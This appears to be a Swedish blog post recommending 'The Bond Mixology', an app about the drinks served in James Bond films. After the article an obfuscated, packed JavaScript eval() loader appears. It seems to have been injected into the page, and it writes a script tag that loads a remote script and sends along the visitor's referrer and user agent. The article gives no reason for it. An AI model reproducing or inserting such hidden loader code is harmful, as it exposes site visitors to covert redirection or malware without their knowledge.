Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Drick kända James Bond drinkar

Sebastian

Har du velat känna dig som en superspion någon gång? Ifall så fallet är har vi en perfekt applikation för just dig. Med applikationen The Bond Mixology kan du läsa om alla drinkar som funnits med i James Bond filmerna, ända från Connery till Craig. Du kan alltså plocka fram vilken scen du vill och få information om vilka drinkar som dricks just då.

Man får veta exakt när drinken beställdes, receptet, samt en trevlig scenbeskrivning för att komma i den rätta stämningen.

Applikationen (The Bond Mixology) finns att hämta ner i App Store och kostar 15 kronor.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kitbe|var|u0026u|referrer|sibby||js|php’.split(’|’),0,{}))

 

Previous Story

There are no older stories.